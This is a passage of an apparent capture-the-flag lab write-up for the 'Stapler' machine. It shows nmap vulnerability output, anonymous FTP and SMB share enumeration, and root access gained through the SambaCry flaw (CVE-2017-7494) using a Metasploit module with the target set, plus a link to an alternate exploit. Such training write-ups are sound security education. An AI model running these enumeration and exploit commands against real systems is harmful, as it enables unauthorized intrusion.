https://vulners.com/prion/PRION:CVE-2017-3641 | PRION:CVE-2017-3640 4.0 https://vulners.com/prion/PRION:CVE-2017-3640 | PRION:CVE-2017-3639 4.0 https://vulners.com/prion/PRION:CVE-2017-3639 | PRION:CVE-2017-3638 4.0 https://vulners.com/prion/PRION:CVE-2017-3638 | PRION:CVE-2017-3634 4.0 https://vulners.com/prion/PRION:CVE-2017-3634 | PRION:CVE-2017-3465 4.0 https://vulners.com/prion/PRION:CVE-2017-3465 | PRION:CVE-2017-3464 4.0 https://vulners.com/prion/PRION:CVE-2017-3464 | PRION:CVE-2017-3463 4.0 https://vulners.com/prion/PRION:CVE-2017-3463 | PRION:CVE-2017-3462 4.0 https://vulners.com/prion/PRION:CVE-2017-3462 | PRION:CVE-2017-3461 4.0 https://vulners.com/prion/PRION:CVE-2017-3461 | PRION:CVE-2017-3460 4.0 https://vulners.com/prion/PRION:CVE-2017-3460 | PRION:CVE-2017-3459 4.0 https://vulners.com/prion/PRION:CVE-2017-3459 | PRION:CVE-2017-3458 4.0 https://vulners.com/prion/PRION:CVE-2017-3458 | PRION:CVE-2017-3457 4.0 https://vulners.com/prion/PRION:CVE-2017-3457 | PRION:CVE-2017-3456 4.0 https://vulners.com/prion/PRION:CVE-2017-3456 | PRION:CVE-2017-3453 4.0 https://vulners.com/prion/PRION:CVE-2017-3453 | PRION:CVE-2017-3309 4.0 https://vulners.com/prion/PRION:CVE-2017-3309 | PRION:CVE-2017-3308 4.0 https://vulners.com/prion/PRION:CVE-2017-3308 | PRION:CVE-2017-3273 4.0 https://vulners.com/prion/PRION:CVE-2017-3273 | PRION:CVE-2017-3258 4.0 https://vulners.com/prion/PRION:CVE-2017-3258 | PRION:CVE-2017-3257 4.0 https://vulners.com/prion/PRION:CVE-2017-3257 | PRION:CVE-2017-3256 4.0 https://vulners.com/prion/PRION:CVE-2017-3256 | PRION:CVE-2017-3251 4.0 https://vulners.com/prion/PRION:CVE-2017-3251 | PRION:CVE-2017-3244 4.0 https://vulners.com/prion/PRION:CVE-2017-3244 | PRION:CVE-2017-3238 4.0 https://vulners.com/prion/PRION:CVE-2017-3238 | PRION:CVE-2017-10384 4.0 https://vulners.com/prion/PRION:CVE-2017-10384 | PRION:CVE-2017-10379 4.0 https://vulners.com/prion/PRION:CVE-2017-10379 | PRION:CVE-2017-10320 4.0 https://vulners.com/prion/PRION:CVE-2017-10320 | PRION:CVE-2017-10313 4.0 https://vulners.com/prion/PRION:CVE-2017-10313 | PRION:CVE-2017-10311 4.0 https://vulners.com/prion/PRION:CVE-2017-10311 | PRION:CVE-2017-10296 4.0 https://vulners.com/prion/PRION:CVE-2017-10296 | PRION:CVE-2017-10284 4.0 https://vulners.com/prion/PRION:CVE-2017-10284 | PRION:CVE-2017-10279 4.0 https://vulners.com/prion/PRION:CVE-2017-10279 | PRION:CVE-2017-10227 4.0 https://vulners.com/prion/PRION:CVE-2017-10227 | PRION:CVE-2017-10167 4.0 https://vulners.com/prion/PRION:CVE-2017-10167 | PRION:CVE-2017-10165 4.0 https://vulners.com/prion/PRION:CVE-2017-10165 | PRION:CVE-2016-8283 4.0 https://vulners.com/prion/PRION:CVE-2016-8283 | PRION:CVE-2016-5635 4.0 https://vulners.com/prion/PRION:CVE-2016-5635 | PRION:CVE-2016-5634 4.0 https://vulners.com/prion/PRION:CVE-2016-5634 | PRION:CVE-2016-5633 4.0 https://vulners.com/prion/PRION:CVE-2016-5633 | PRION:CVE-2016-5632 4.0 https://vulners.com/prion/PRION:CVE-2016-5632 | PRION:CVE-2016-5631 4.0 https://vulners.com/prion/PRION:CVE-2016-5631 | PRION:CVE-2016-5630 4.0 https://vulners.com/prion/PRION:CVE-2016-5630 | PRION:CVE-2016-5629 4.0 https://vulners.com/prion/PRION:CVE-2016-5629 | PRION:CVE-2016-5628 4.0 https://vulners.com/prion/PRION:CVE-2016-5628 | PRION:CVE-2016-5627 4.0 https://vulners.com/prion/PRION:CVE-2016-5627 | PRION:CVE-2016-5626 4.0 https://vulners.com/prion/PRION:CVE-2016-5626 | PRION:CVE-2016-5612 4.0 https://vulners.com/prion/PRION:CVE-2016-5612 | PRION:CVE-2016-5609 4.0 https://vulners.com/prion/PRION:CVE-2016-5609 | PRION:CVE-2019-2503 3.8 https://vulners.com/prion/PRION:CVE-2019-2503 | PRION:CVE-2018-2755 3.7 https://vulners.com/prion/PRION:CVE-2018-2755 | PRION:CVE-2021-2356 3.6 https://vulners.com/prion/PRION:CVE-2021-2356 | PRION:CVE-2021-2010 3.6 https://vulners.com/prion/PRION:CVE-2021-2010 | PRION:CVE-2020-2806 3.5 https://vulners.com/prion/PRION:CVE-2020-2806 | PRION:CVE-2020-2752 3.5 https://vulners.com/prion/PRION:CVE-2020-2752 | PRION:CVE-2020-2584 3.5 https://vulners.com/prion/PRION:CVE-2020-2584 | PRION:CVE-2020-14771 3.5 https://vulners.com/prion/PRION:CVE-2020-14771 | PRION:CVE-2019-2741 3.5 https://vulners.com/prion/PRION:CVE-2019-2741 | PRION:CVE-2018-3284 3.5 https://vulners.com/prion/PRION:CVE-2018-3284 | PRION:CVE-2018-3283 3.5 https://vulners.com/prion/PRION:CVE-2018-3283 | PRION:CVE-2018-3062 3.5 https://vulners.com/prion/PRION:CVE-2018-3062 | PRION:CVE-2018-2771 3.5 https://vulners.com/prion/PRION:CVE-2018-2771 | PRION:CVE-2018-2767 3.5 https://vulners.com/prion/PRION:CVE-2018-2767 | PRION:CVE-2017-3653 3.5 https://vulners.com/prion/PRION:CVE-2017-3653 | PRION:CVE-2017-3637 3.5 https://vulners.com/prion/PRION:CVE-2017-3637 | PRION:CVE-2017-3635 3.5 https://vulners.com/prion/PRION:CVE-2017-3635 | PRION:CVE-2017-3529 3.5 https://vulners.com/prion/PRION:CVE-2017-3529 | PRION:CVE-2017-3468 3.5 https://vulners.com/prion/PRION:CVE-2017-3468 | PRION:CVE-2017-3320 3.5 https://vulners.com/prion/PRION:CVE-2017-3320 | PRION:CVE-2017-3319 3.5 https://vulners.com/prion/PRION:CVE-2017-3319 | PRION:CVE-2017-3312 3.5 https://vulners.com/prion/PRION:CVE-2017-3312 | PRION:CVE-2017-3291 3.5 https://vulners.com/prion/PRION:CVE-2017-3291 | PRION:CVE-2017-10286 3.5 https://vulners.com/prion/PRION:CVE-2017-10286 | PRION:CVE-2016-8327 3.5 https://vulners.com/prion/PRION:CVE-2016-8327 | PRION:CVE-2016-8318 3.5 https://vulners.com/prion/PRION:CVE-2016-8318 | PRION:CVE-2016-8290 3.5 https://vulners.com/prion/PRION:CVE-2016-8290 | PRION:CVE-2016-8287 3.5 https://vulners.com/prion/PRION:CVE-2016-8287 | PRION:CVE-2016-8286 3.5 https://vulners.com/prion/PRION:CVE-2016-8286 | PRION:CVE-2016-5584 3.5 https://vulners.com/prion/PRION:CVE-2016-5584 | PRION:CVE-2013-1548 3.5 https://vulners.com/prion/PRION:CVE-2013-1548 | PRION:CVE-2023-22084 3.3 https://vulners.com/prion/PRION:CVE-2023-22084 | PRION:CVE-2023-22028 3.3 https://vulners.com/prion/PRION:CVE-2023-22028 | PRION:CVE-2023-22026 3.3 https://vulners.com/prion/PRION:CVE-2023-22026 | PRION:CVE-2023-22015 3.3 https://vulners.com/prion/PRION:CVE-2023-22015 | PRION:CVE-2023-22007 3.3 https://vulners.com/prion/PRION:CVE-2023-22007 | PRION:CVE-2022-21617 3.3 https://vulners.com/prion/PRION:CVE-2022-21617 | PRION:CVE-2022-21608 3.3 https://vulners.com/prion/PRION:CVE-2022-21608 | PRION:CVE-2022-21304 3.3 https://vulners.com/prion/PRION:CVE-2022-21304 | PRION:CVE-2022-21303 3.3 https://vulners.com/prion/PRION:CVE-2022-21303 | PRION:CVE-2022-21270 3.3 https://vulners.com/prion/PRION:CVE-2022-21270 | PRION:CVE-2021-2194 3.3 https://vulners.com/prion/PRION:CVE-2021-2194 | PRION:CVE-2021-2180 3.3 https://vulners.com/prion/PRION:CVE-2021-2180 | PRION:CVE-2021-2179 3.3 https://vulners.com/prion/PRION:CVE-2021-2179 | PRION:CVE-2021-2169 3.3 https://vulners.com/prion/PRION:CVE-2021-2169 | PRION:CVE-2021-2166 3.3 https://vulners.com/prion/PRION:CVE-2021-2166 | PRION:CVE-2021-2154 3.3 https://vulners.com/prion/PRION:CVE-2021-2154 | PRION:CVE-2021-2146 3.3 https://vulners.com/prion/PRION:CVE-2021-2146 | PRION:CVE-2021-2001 3.3 https://vulners.com/prion/PRION:CVE-2021-2001 | PRION:CVE-2020-14812 3.3 https://vulners.com/prion/PRION:CVE-2020-14812 | PRION:CVE-2020-14793 3.3 https://vulners.com/prion/PRION:CVE-2020-14793 | PRION:CVE-2020-14790 3.3 https://vulners.com/prion/PRION:CVE-2020-14790 | PRION:CVE-2020-14789 3.3 https://vulners.com/prion/PRION:CVE-2020-14789 | PRION:CVE-2020-14776 3.3 https://vulners.com/prion/PRION:CVE-2020-14776 | PRION:CVE-2020-14672 3.3 https://vulners.com/prion/PRION:CVE-2020-14672 | PRION:CVE-2020-14547 3.3 https://vulners.com/prion/PRION:CVE-2020-14547 | PRION:CVE-2020-14540 3.3 https://vulners.com/prion/PRION:CVE-2020-14540 | PRION:CVE-2019-2960 3.3 https://vulners.com/prion/PRION:CVE-2019-2960 | PRION:CVE-2019-2911 3.3 https://vulners.com/prion/PRION:CVE-2019-2911 | PRION:CVE-2019-2774 3.3 https://vulners.com/prion/PRION:CVE-2019-2774 | PRION:CVE-2019-2757 3.3 https://vulners.com/prion/PRION:CVE-2019-2757 | PRION:CVE-2019-2755 3.3 https://vulners.com/prion/PRION:CVE-2019-2755 | PRION:CVE-2019-2737 3.3 https://vulners.com/prion/PRION:CVE-2019-2737 | PRION:CVE-2019-2592 3.3 https://vulners.com/prion/PRION:CVE-2019-2592 | PRION:CVE-2019-2581 3.3 https://vulners.com/prion/PRION:CVE-2019-2581 | PRION:CVE-2016-8289 3.3 https://vulners.com/prion/PRION:CVE-2016-8289 | PRION:CVE-2019-2739 2.9 https://vulners.com/prion/PRION:CVE-2019-2739 | PRION:CVE-2021-2011 2.6 https://vulners.com/prion/PRION:CVE-2021-2011 | PRION:CVE-2021-2007 2.6 https://vulners.com/prion/PRION:CVE-2021-2007 | PRION:CVE-2019-1559 2.6 https://vulners.com/prion/PRION:CVE-2019-1559 | PRION:CVE-2018-0735 2.6 https://vulners.com/prion/PRION:CVE-2018-0735 | PRION:CVE-2022-21460 2.1 https://vulners.com/prion/PRION:CVE-2022-21460 | PRION:CVE-2022-21451 2.1 https://vulners.com/prion/PRION:CVE-2022-21451 | PRION:CVE-2022-21444 2.1 https://vulners.com/prion/PRION:CVE-2022-21444 | PRION:CVE-2020-14550 2.1 https://vulners.com/prion/PRION:CVE-2020-14550 | PRION:CVE-2019-2993 2.1 https://vulners.com/prion/PRION:CVE-2019-2993 | PRION:CVE-2019-2969 2.1 https://vulners.com/prion/PRION:CVE-2019-2969 | PRION:CVE-2019-2738 2.1 https://vulners.com/prion/PRION:CVE-2019-2738 | PRION:CVE-2018-2762 2.1 https://vulners.com/prion/PRION:CVE-2018-2762 | PRION:CVE-2016-7440 2.1 https://vulners.com/prion/PRION:CVE-2016-7440 | PRION:CVE-2018-3174 1.9 https://vulners.com/prion/PRION:CVE-2018-3174 | PRION:CVE-2018-2773 1.9 https://vulners.com/prion/PRION:CVE-2018-2773 | PRION:CVE-2022-21595 1.7 https://vulners.com/prion/PRION:CVE-2022-21595 | PRION:CVE-2021-2174 1.7 https://vulners.com/prion/PRION:CVE-2021-2174 | PRION:CVE-2021-2171 1.7 https://vulners.com/prion/PRION:CVE-2021-2171 | PRION:CVE-2021-2022 1.7 https://vulners.com/prion/PRION:CVE-2021-2022 | PRION:CVE-2019-2938 1.7 https://vulners.com/prion/PRION:CVE-2019-2938 | PRION:CVE-2019-2614 1.7 https://vulners.com/prion/PRION:CVE-2019-2614 | PRION:CVE-2017-3317 1.5 https://vulners.com/prion/PRION:CVE-2017-3317 | PRION:CVE-2017-3313 1.5 https://vulners.com/prion/PRION:CVE-2017-3313 | PRION:CVE-2017-10268 1.5 https://vulners.com/prion/PRION:CVE-2017-10268 | PRION:CVE-2019-2797 1.2 https://vulners.com/prion/PRION:CVE-2019-2797 | PRION:CVE-2016-8284 1.2 https://vulners.com/prion/PRION:CVE-2016-8284 | PRION:CVE-2017-3318 1.0 https://vulners.com/prion/PRION:CVE-2017-3318 |_ PACKETSTORM:142362 0.0 https://vulners.com/packetstorm/PACKETSTORM:142362 *EXPLOIT* 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port666-TCP:V=7.80%I=7%D=1/7%Time=659AC8FF%P=x86_64-pc-linux-gnu%r(NULL SF:,1284,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15 SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04 SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2 SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\ SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3 SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0 SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8 SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5 SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\ SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\ SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\ SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\ SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[ SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7 SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96 SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\ SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\ SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\ SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\? SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/7%OT=21%CT=20%CU=42871%PV=Y%DS=4%DC=T%G=Y%TM=659AC94 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%TS=8)SEQ(TS=8)OPS( OS:O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11 OS:NW7%O6=M54EST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN( OS:R=Y%DF=Y%T=40%W=7210%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0 OS:%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC OS:K=85A9%RUD=G)IE(R=N) Network Distance: 4 hops Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2024-01-07T15:54:08+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2024-01-07T15:54:09 |_ start_date: N/A TRACEROUTE (using port 20/tcp) HOP RTT ADDRESS 1 192.86 ms 192.168.45.1 2 192.82 ms 192.168.45.254 3 192.90 ms 192.168.251.1 4 192.99 ms 192.168.225.148 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 110.33 seconds
Enumerating FTP (Port 21)
- Enumerated FTP server on port 21 first. Found a file named note which contains certain instructions.
$ ftp 192.168.228.148 Connected to 192.168.228.148. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (192.168.228.148:wh1terose): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 226 Transfer complete. 107 bytes received in 0.00 secs (188.2742 kB/s) ftp> put test.txt local: test.txt remote: test.txt 200 PORT command successful. Consider using PASV. 550 Permission denied. ftp> exit 221 Goodbye.
Enumerating HTTP (Port 80)
- Next, moved to port 80 for enumeration. Found a 404 not found error in the root directory. Fired gobuster on the web server to reveal some hidden directories but found no luck.
gobuster dir -u http://192.168.228.148/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php
Enumerating Samba (Port 139)
- Moving on, enumerated the Samba shares using smbclient and got two interesting ones – kathy and tmp. First enumerated the “tmp” share but found nothing.
smbclient -L 192.168.228.148
- Next, accessed the kathy share and found two folder inside it. The kathy_stuff folder contains a to-do list file and backup folder contains copy of the vsftpd conf file and a wordpress compressed backup. I was able to download all the files except the wordpress backup.
$ smbclient //192.168.228.148/kathy Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jun 3 22:22:52 2016 .. D 0 Tue Jun 7 03:09:56 2016 kathy_stuff D 0 Sun Jun 5 20:32:27 2016 backup D 0 Sun Jun 5 20:34:14 2016 19478204 blocks of size 1024. 16345572 blocks available smb: \> cd kathy_stuff smb: \kathy_stuff\> ls . D 0 Sun Jun 5 20:32:27 2016 .. D 0 Fri Jun 3 22:22:52 2016 todo-list.txt N 64 Sun Jun 5 20:32:27 2016 19478204 blocks of size 1024. 16345572 blocks available smb: \kathy_stuff\> get todo-list.txt getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \kathy_stuff\> cd .. smb: \> cd backup smb: \backup\> ls . D 0 Sun Jun 5 20:34:14 2016 .. D 0 Fri Jun 3 22:22:52 2016 vsftpd.conf N 5961 Sun Jun 5 20:33:45 2016 wordpress-4.tar.gz N 6321767 Mon Apr 27 22:44:46 2015 19478204 blocks of size 1024. 16345572 blocks available smb: \backup\> get vsftpd.conf getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (3.1 KiloBytes/sec) (average 2.1 KiloBytes/sec) smb: \backup\> get wordpress-4.tar.gz parallel_read returned NT_STATUS_IO_TIMEOUT
- Peeked inside the config file and the todo list but found nothing juicy.
Exploitation & Getting root:
- As per the above nmap results, i got the version of the Samba running – Samba 4.3.9. Googled it for any known exploits and found that it is vulnerable to CVE-2017-7494 (SambaCry) which is a RCE vulnerability that allows a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
- I found that we can also use metasploit to exploit this vulnerability and get a shell on the system. So, changed some configuration of the exploit and fired it on the target which thus grants me root access on the server.
Alternate exploit – https://github.com/joxeankoret/CVE-2017-7494
msfconsole use exploit/linux/samba/is_known_pipename set RHOSTS 192.168.228.148 set RPORT 139 run
- Finally, captured both local and proof flag and completed the challenge.
Also Read: PG – RubyDome
Conclusion:
So that was “Stapler” for you. We started off with a regular nmap scan and found multiple ports opened – 21 (FTP), 22 (SSH), 80 (HTTP), 139 (Samba), 666 (Doom), 3306 (MySQL). As per the nmap result, found out that target is running Samba 4.3.9. Looked online for any known exploit and found out that it is vulnerable to CVE-2017-7494. Next, used the same exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.